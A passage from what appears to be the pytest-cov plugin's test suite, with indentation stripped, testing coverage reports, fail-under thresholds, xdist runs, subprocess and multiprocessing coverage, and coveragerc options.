foo = "a" # previously there was a "pass" here but Python 3.5 optimizes it away.
if idx == 1:
foo = "b" # previously there was a "pass" here but Python 3.5 optimizes it away.
'''
SCRIPT_PARENT = '''
import os
import subprocess
import sys
def pytest_generate_tests(metafunc):
for i in range(2):
metafunc.addcall(funcargs=dict(idx=i))
def test_foo(idx):
out, err = subprocess.Popen(
[sys.executable, os.path.join(os.path.dirname(__file__), 'child_script.py'), str(idx)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
# there is a issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_PARENT_CHANGE_CWD = '''
import subprocess
import sys
import os
def pytest_generate_tests(metafunc):
for i in range(2):
metafunc.addcall(funcargs=dict(idx=i))
def test_foo(idx):
os.mkdir("foobar")
os.chdir("foobar")
subprocess.check_call([
sys.executable,
os.path.join(os.path.dirname(__file__), 'child_script.py'),
str(idx)
])
# there is a issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_PARENT_CHANGE_CWD_IMPORT_CHILD = '''
import subprocess
import sys
import os
def pytest_generate_tests(metafunc):
for i in range(2):
metafunc.addcall(funcargs=dict(idx=i))
def test_foo(idx):
os.mkdir("foobar")
os.chdir("foobar")
subprocess.check_call([
sys.executable,
'-c', 'import sys; sys.argv = ["", str(%s)]; import child_script' % idx
])
# there is a issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_FUNCARG = '''
import coverage
def test_foo(cov):
assert isinstance(cov, coverage.coverage)
'''
SCRIPT_FUNCARG_NOT_ACTIVE = '''
def test_foo(cov):
assert cov is None
'''
SCRIPT_FAIL = '''
def test_fail():
assert False
'''
CHILD_SCRIPT_RESULT = '[56] * 100%'
PARENT_SCRIPT_RESULT = '9 * 100%'
DEST_DIR = 'cov_dest'
REPORT_NAME = 'cov.xml'
xdist = pytest.mark.parametrize('opts', ['', '-n 1'], ids=['nodist', 'xdist'])
@pytest.fixture(params=[
('branch=true', '--cov-branch', '9 * 85%', '3 * 100%'),
('branch=true', '', '9 * 85%', '3 * 100%'),
('', '--cov-branch', '9 * 85%', '3 * 100%'),
('', '', '9 * 89%', '3 * 100%'),
], ids=['branch2x', 'branch1c', 'branch1a', 'nobranch'])
def prop(request):
return Namespace(
code=SCRIPT,
code2=SCRIPT2,
conf=request.param[0],
fullconf='[run]\n%s\n' % request.param[0],
prefixedfullconf='[coverage:run]\n%s\n' % request.param[0],
args=request.param[1].split(),
result=request.param[2],
result2=request.param[3],
)
def test_central(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script,
*prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
def test_annotate(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=annotate',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage annotated source written next to source',
'*10 passed*',
])
assert result.ret == 0
def test_annotate_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=annotate:' + DEST_DIR,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage annotated source written to dir ' + DEST_DIR,
'*10 passed*',
])
dest_dir = testdir.tmpdir.join(DEST_DIR)
assert dest_dir.check(dir=True)
assert dest_dir.join(script.basename + ",cover").check()
assert result.ret == 0
def test_html_output_dir(testdir, prop):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=html:' + DEST_DIR,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage HTML written to dir ' + DEST_DIR,
'*10 passed*',
])
dest_dir = testdir.tmpdir.join(DEST_DIR)
assert dest_dir.check(dir=True)
assert dest_dir.join("index.html").check()
assert result.ret == 0
def test_xml_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=xml:' + REPORT_NAME,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage XML written to file ' + REPORT_NAME,
'*10 passed*',
])
assert testdir.tmpdir.join(REPORT_NAME).check()
assert result.ret == 0
def test_term_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term:' + DEST_DIR,
script)
result.stderr.fnmatch_lines([
'*argument --cov-report: output specifier not supported for: "term:%s"*' % DEST_DIR,
])
assert result.ret != 0
def test_term_missing_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing:' + DEST_DIR,
script)
result.stderr.fnmatch_lines([
'*argument --cov-report: output specifier not supported for: '
'"term-missing:%s"*' % DEST_DIR,
])
assert result.ret != 0
def test_cov_min_100(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=100',
script)
assert result.ret != 0
result.stdout.fnmatch_lines([
'FAIL Required test coverage of 100% not reached. Total coverage: *%'
])
def test_cov_min_50(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=50',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([
'Required test coverage of 50% reached. Total coverage: *%'
])
def test_cov_min_no_report(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=',
'--cov-fail-under=50',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([
'Required test coverage of 50% reached. Total coverage: *%'
])
def test_central_nonspecific(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_nonspecific* %s *' % prop.result,
'*10 passed*'
])
# multi-module coverage report
assert any(line.startswith('TOTAL ') for line in result.stdout.lines)
assert result.ret == 0
@pytest.mark.skipif('StrictVersion(coverage.__version__) <= StrictVersion("3.8")')
def test_cov_min_from_coveragerc(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[report]
fail_under = 100
""")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret != 0
def test_central_coveragerc(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(COVERAGERC_SOURCE + prop.conf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_coveragerc* %s *' % prop.result,
'*10 passed*',
])
# single-module coverage report
assert all(not line.startswith('TOTAL ') for line in result.stdout.lines[-4:])
assert result.ret == 0
@xdist
def test_central_with_path_aliasing(testdir, monkeypatch, opts, prop):
mod1 = testdir.mkdir('src').join('mod.py')
mod1.write(SCRIPT)
mod2 = testdir.mkdir('aliased').join('mod.py')
mod2.write(SCRIPT)
script = testdir.makepyfile('''
from mod import *
''')
testdir.tmpdir.join('setup.cfg').write("""
[coverage:paths]
source =
src
aliased
[coverage:run]
source = mod
parallel = true
%s
""" % prop.conf)
monkeypatch.setitem(os.environ, 'PYTHONPATH', os.pathsep.join([os.environ.get('PYTHONPATH', ''), 'aliased']))
result = testdir.runpytest('-v', '-s',
'--cov',
'--cov-report=term-missing',
script, *opts.split()+prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'src[\\/]mod* %s *' % prop.result,
'*10 passed*',
])
# single-module coverage report
assert all(not line.startswith('TOTAL ') for line in result.stdout.lines[-4:])
assert result.ret == 0
def test_subprocess_with_path_aliasing(testdir, monkeypatch):
src = testdir.mkdir('src')
src.join('parent_script.py').write(SCRIPT_PARENT)
src.join('child_script.py').write(SCRIPT_CHILD)
aliased = testdir.mkdir('aliased')
parent_script = aliased.join('parent_script.py')
parent_script.write(SCRIPT_PARENT)
aliased.join('child_script.py').write(SCRIPT_CHILD)
testdir.tmpdir.join('.coveragerc').write("""
[paths]
source =
src
aliased
[run]
source =
parent_script
child_script
parallel = true
""")
monkeypatch.setitem(os.environ, 'PYTHONPATH', os.pathsep.join([os.environ.get('PYTHONPATH',''), 'aliased']))
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'src[\\/]child_script* %s*' % CHILD_SCRIPT_RESULT,
'src[\\/]parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_show_missing_coveragerc(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write("""
[run]
source = .
%s
[report]
show_missing = true
""" % prop.conf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Name * Stmts * Miss * Cover * Missing',
'test_show_missing_coveragerc* %s * 11*' % prop.result,
'*10 passed*',
])
# single-module coverage report
assert all(not line.startswith('TOTAL ') for line in result.stdout.lines[-4:])
assert result.ret == 0
def test_no_cov_on_fail(testdir):
script = testdir.makepyfile(SCRIPT_FAIL)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--no-cov-on-fail',
script)
assert 'coverage: platform' not in result.stdout.str()
result.stdout.fnmatch_lines(['*1 failed*'])
def test_no_cov(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-vvv',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--no-cov',
'-rw',
script)
result.stdout.fnmatch_lines_random([
'WARNING: Coverage disabled via --no-cov switch!',
'*Coverage disabled via --no-cov switch!',
])
def test_cov_and_failure_report_on_fail(testdir):
script = testdir.makepyfile(SCRIPT + SCRIPT_FAIL)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-fail-under=100',
script)
result.stdout.fnmatch_lines_random([
'*10 failed*',
'*coverage: platform*',
'*FAIL Required test coverage of 100% not reached*',
'*assert False*',
])
def test_dist_combine_racecondition(testdir):
script = testdir.makepyfile("""
import pytest
@pytest.mark.parametrize("foo", range(1000))
def test_foo(foo):
""" + "\n".join("""
if foo == %s:
assert True
""" % i for i in range(1000)))
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'-n', '5', '-s',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_combine_racecondition* 2002 * 0 * 100%*',
'*1000 passed*'
])
for line in chain(result.stdout.lines, result.stderr.lines):
assert 'The following slaves failed to return coverage data' not in line
assert 'INTERNALERROR' not in line
assert result.ret == 0
def test_dist_collocated(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
'--max-slave-restart=0',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_collocated* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
def test_dist_not_collocated(testdir, prop):
script = testdir.makepyfile(prop.code)
dir1 = testdir.mkdir('dir1')
dir2 = testdir.mkdir('dir2')
testdir.tmpdir.join('.coveragerc').write('''
[run]
%s
[paths]
source =
.
dir1
dir2''' % prop.conf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=popen//chdir=%s' % dir1,
'--tx=popen//chdir=%s' % dir2,
'--rsyncdir=%s' % script.basename,
'--rsyncdir=.coveragerc',
'--max-slave-restart=0', '-s',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_not_collocated* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
def test_central_subprocess(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_central_subprocess_change_cwd(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT_CHANGE_CWD,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
testdir.makefile('', coveragerc="""
[run]
branch = true
parallel = true
""")
result = testdir.runpytest('-v', '-s',
'--cov=%s' % scripts.dirpath(),
'--cov-config=coveragerc',
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'*child_script* %s*' % CHILD_SCRIPT_RESULT,
'*parent_script* 100%*',
])
assert result.ret == 0
def test_central_subprocess_change_cwd_with_pythonpath(testdir, monkeypatch):
stuff = testdir.mkdir('stuff')
parent_script = stuff.join('parent_script.py')
parent_script.write(SCRIPT_PARENT_CHANGE_CWD_IMPORT_CHILD)
stuff.join('child_script.py').write(SCRIPT_CHILD)
testdir.makefile('', coveragerc="""
[run]
parallel = true
""")
monkeypatch.setitem(os.environ, 'PYTHONPATH', str(stuff))
result = testdir.runpytest('-vv', '-s',
'--cov=child_script',
'--cov-config=coveragerc',
'--cov-report=term-missing',
'--cov-branch',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'*child_script* %s*' % CHILD_SCRIPT_RESULT,
])
assert result.ret == 0
def test_central_subprocess_no_subscript(testdir):
script = testdir.makepyfile("""
import subprocess, sys
def test_foo():
subprocess.check_call([sys.executable, '-c', 'print("Hello World")'])
""")
testdir.makefile('', coveragerc="""
[run]
parallel = true
omit =
*/__init__.py
""")
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-branch',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_subprocess_no_subscript* * 3 * 0 * 100%*',
])
assert result.ret == 0
def test_dist_subprocess_collocated(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
'--max-slave-restart=0',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_dist_subprocess_not_collocated(testdir, tmpdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
child_script = scripts.dirpath().join('child_script.py')
dir1 = tmpdir.mkdir('dir1')
dir2 = tmpdir.mkdir('dir2')
testdir.tmpdir.join('.coveragerc').write('''
[paths]
source =
%s
*/dir1
*/dir2
''' % scripts.dirpath())
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--dist=load',
'--tx=popen//chdir=%s' % dir1,
'--tx=popen//chdir=%s' % dir2,
'--rsyncdir=%s' % child_script,
'--rsyncdir=%s' % parent_script,
'--rsyncdir=.coveragerc',
'--max-slave-restart=0',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_invalid_coverage_source(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=non_existent_module',
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*10 passed*'
])
result.stderr.fnmatch_lines([
'Coverage.py warning: No data was collected.*'
])
result.stdout.fnmatch_lines([
'*Failed to generate report: No data to report.',
])
assert result.ret == 0
matching_lines = [line for line in result.outlines if '%' in line]
assert not matching_lines
@pytest.mark.skipif("'dev' in pytest.__version__")
def test_dist_missing_data(testdir):
venv_path = os.path.join(str(testdir.tmpdir), 'venv')
virtualenv.create_environment(venv_path)
if sys.platform == 'win32':
exe = os.path.join(venv_path, 'Scripts', 'python.exe')
else:
exe = os.path.join(venv_path, 'bin', 'python')
subprocess.check_call([
exe,
'-mpip',
'install',
'py==%s' % py.__version__,
'pytest==%s' % pytest.__version__
])
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=popen//python=%s' % exe,
'--max-slave-restart=0',
script)
result.stdout.fnmatch_lines([
'*- coverage: failed slaves -*'
])
assert result.ret == 0
def test_funcarg(testdir):
script = testdir.makepyfile(SCRIPT_FUNCARG)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_funcarg* 3 * 100%*',
'*1 passed*'
])
assert result.ret == 0
def test_funcarg_not_active(testdir):
script = testdir.makepyfile(SCRIPT_FUNCARG_NOT_ACTIVE)
result = testdir.runpytest('-v',
script)
result.stdout.fnmatch_lines([
'*1 passed*'
])
assert result.ret == 0
def test_multiprocessing_subprocess(testdir):
py.test.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn():
a = True
return a
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
p.join()
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_subprocess* 8 * 100%*',
'*1 passed*'
])
assert result.ret == 0
def test_multiprocessing_subprocess_no_source(testdir):
py.test.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn():
a = True
return a
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
p.join()
''')
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_subprocess* 8 * 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"',
reason="multiprocessing don't support clean process temination on Windows")
def test_multiprocessing_subprocess_with_terminate(testdir):
py.test.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
import time
from pytest_cov.embed import cleanup_on_sigterm
cleanup_on_sigterm()
event = multiprocessing.Event()
def target_fn():
a = True
event.set()
time.sleep(5)
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
event.wait(1)
p.terminate()
p.join()
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_subprocess* 15 * 100%*',
'*1 passed*'
])
assert result.ret == 0
MODULE = '''
def func():
return 1
'''
CONFTEST = '''
import mod
mod.func()
'''
BASIC_TEST = '''
def test_basic():
x = True
assert x
'''
CONF_RESULT = 'mod* 2 * 100%*'
def test_cover_conftest(testdir):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([CONF_RESULT])
def test_cover_looponfail(testdir, monkeypatch):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
monkeypatch.setattr(testdir, 'run', lambda *args: _TestProcess(*map(str, args)))
with testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--looponfail',
script) as process:
with dump_on_error(process.read):
wait_for_strings(
process.read,
30, # 30 seconds
'Stmts Miss Cover'
)
def test_cover_conftest_dist(testdir):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
'--max-slave-restart=0',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([CONF_RESULT])
def test_no_cover_marker(testdir):
testdir.makepyfile(mod=MODULE)
script = testdir.makepyfile('''
import pytest
import mod
import subprocess
import sys
@pytest.mark.no_cover
def test_basic():
mod.func()
subprocess.check_call([sys.executable, '-c', 'from mod import func; func()'])
''')
result = testdir.runpytest('-v', '-ra', '--strict',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['mod* 2 * 1 * 50% * 2'])
def test_no_cover_fixture(testdir):
testdir.makepyfile(mod=MODULE)
script = testdir.makepyfile('''
import mod
import subprocess
import sys
def test_basic(no_cover):
mod.func()
subprocess.check_call([sys.executable, '-c', 'from mod import func; func()'])
''')
result = testdir.runpytest('-v', '-ra', '--strict',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['mod* 2 * 1 * 50% * 2'])
COVERAGERC = '''
[report]
# Regexes for lines to exclude from consideration
exclude_lines =
raise NotImplementedError
'''
EXCLUDED_TEST = '''
def func():
raise NotImplementedError
def test_basic():
x = True
assert x
'''
EXCLUDED_RESULT = '4 * 100%*'
def test_coveragerc(testdir):
testdir.makefile('', coveragerc=COVERAGERC)
script = testdir.makepyfile(EXCLUDED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['test_coveragerc* %s' % EXCLUDED_RESULT])
def test_coveragerc_dist(testdir):
testdir.makefile('', coveragerc=COVERAGERC)
script = testdir.makepyfile(EXCLUDED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'-n', '2',
'--max-slave-restart=0',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(
['test_coveragerc_dist* %s' % EXCLUDED_RESULT])
SKIP_COVERED_COVERAGERC = '''
[report]
skip_covered = True
'''
SKIP_COVERED_TEST = '''
def func():
return "full coverage"
def test_basic():
assert func() == "full coverage"
'''
SKIP_COVERED_RESULT = '1 file skipped due to complete coverage.'
@pytest.mark.skipif('StrictVersion(coverage.__version__) < StrictVersion("4.0")')
@pytest.mark.parametrize('report_option', [
'term-missing:skip-covered',
'term:skip-covered'])
def test_skip_covered_cli(testdir, report_option):
testdir.makefile('', coveragerc=SKIP_COVERED_COVERAGERC)
script = testdir.makepyfile(SKIP_COVERED_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=%s' % report_option,
script)
assert result.ret == 0
result.stdout.fnmatch_lines([SKIP_COVERED_RESULT])
@pytest.mark.skipif('StrictVersion(coverage.__version__) < StrictVersion("4.0")')
def test_skip_covered_coveragerc_config(testdir):
testdir.makefile('', coveragerc=SKIP_COVERED_COVERAGERC)
script = testdir.makepyfile(SKIP_COVERED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
result.stdout.fnmatch_lines([SKIP_COVERED_RESULT])
CLEAR_ENVIRON_TEST = '''
import os
def test_basic():
os.environ.clear()
'''
def test_clear_environ(testdir):
script = testdir.makepyfile(CLEAR_ENVIRON_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
SCRIPT_SIMPLE = '''
def test_foo():
assert 1 == 1
x = True
assert x
'''
SCRIPT_SIMPLE_RESULT = '4 * 100%'
@pytest.mark.skipif('sys.platform == "win32"')
def test_dist_boxed(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--boxed',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_boxed* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"')
def test_dist_bare_cov(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov',
'-n', '1',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_bare_cov* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
def test_not_started_plugin_does_not_fail(testdir):
class ns:
cov_source = [True]
cov_report = ''
plugin = pytest_cov.plugin.CovPlugin(ns, None, start=False)
plugin.pytest_runtestloop(None)
plugin.pytest_terminal_summary(None)
def test_default_output_setting(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
result.stdout.fnmatch_lines([
'*coverage*'
])
assert result.ret == 0
def test_disabled_output(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=',
script)
assert 'coverage' not in result.stdout.str()
assert result.ret == 0
def test_coverage_file(testdir):
script = testdir.makepyfile(SCRIPT)
data_file_name = 'covdata'
os.environ['COVERAGE_FILE'] = data_file_name
try:
result = testdir.runpytest('-v', '--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
data_file = testdir.tmpdir.join(data_file_name)
assert data_file.check()
finally:
os.environ.pop('COVERAGE_FILE')
def test_external_data_file(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[run]
data_file = %s
""" % testdir.tmpdir.join('some/special/place/coverage-data').ensure())
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('some/special/place/coverage-data*')))
def test_external_data_file_xdist(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[run]
parallel = true
data_file = %s
""" % testdir.tmpdir.join('some/special/place/coverage-data').ensure())
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'-n', '1',
'--max-slave-restart=0',
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('some/special/place/coverage-data*')))
def test_external_data_file_negative(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('.coverage*')))
@xdist
def xtest_append_coverage(testdir, opts, prop):
script = testdir.makepyfile(test_1=prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
])
script2 = testdir.makepyfile(test_2=prop.code2)
result = testdir.runpytest('-v',
'--cov-append',
'--cov=%s' % script2.dirpath(),
script2,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
'test_2* %s*' % prop.result2,
])
@xdist
def xtest_do_not_append_coverage(testdir, opts, prop):
script = testdir.makepyfile(test_1=prop.code)
testdir.tmpdir.join('.coveragerc').write("")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
])
script2 = testdir.makepyfile(test_2=prop.code2)
result = testdir.runpytest('-v',
'--cov=%s' % script2.dirpath(),
script2,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* 0%',
'test_2* %s*' % prop.result2,
])
def test_pth_failure(monkeypatch):
with open('src/pytest-cov.pth') as fh:
payload = fh.read()
class SpecificError(Exception):
pass
def bad_init():
raise SpecificError()
buff = StringIO()
from pytest_cov import embed
monkeypatch.setattr(embed, 'init', bad_init)
monkeypatch.setattr(sys, 'stderr', buff)
monkeypatch.setitem(os.environ, 'COV_CORE_SOURCE', 'foobar')
exec_(payload)
assert buff.getvalue() == '''pytest-cov: Failed to setup subprocess coverage. Environ: {'COV_CORE_SOURCE': 'foobar'} Exception: SpecificError()
'''
def test_double_cov(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov', '--cov=%s' % script.dirpath(),
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_double_cov* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
def test_double_cov2(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov', '--cov',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_double_cov2* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
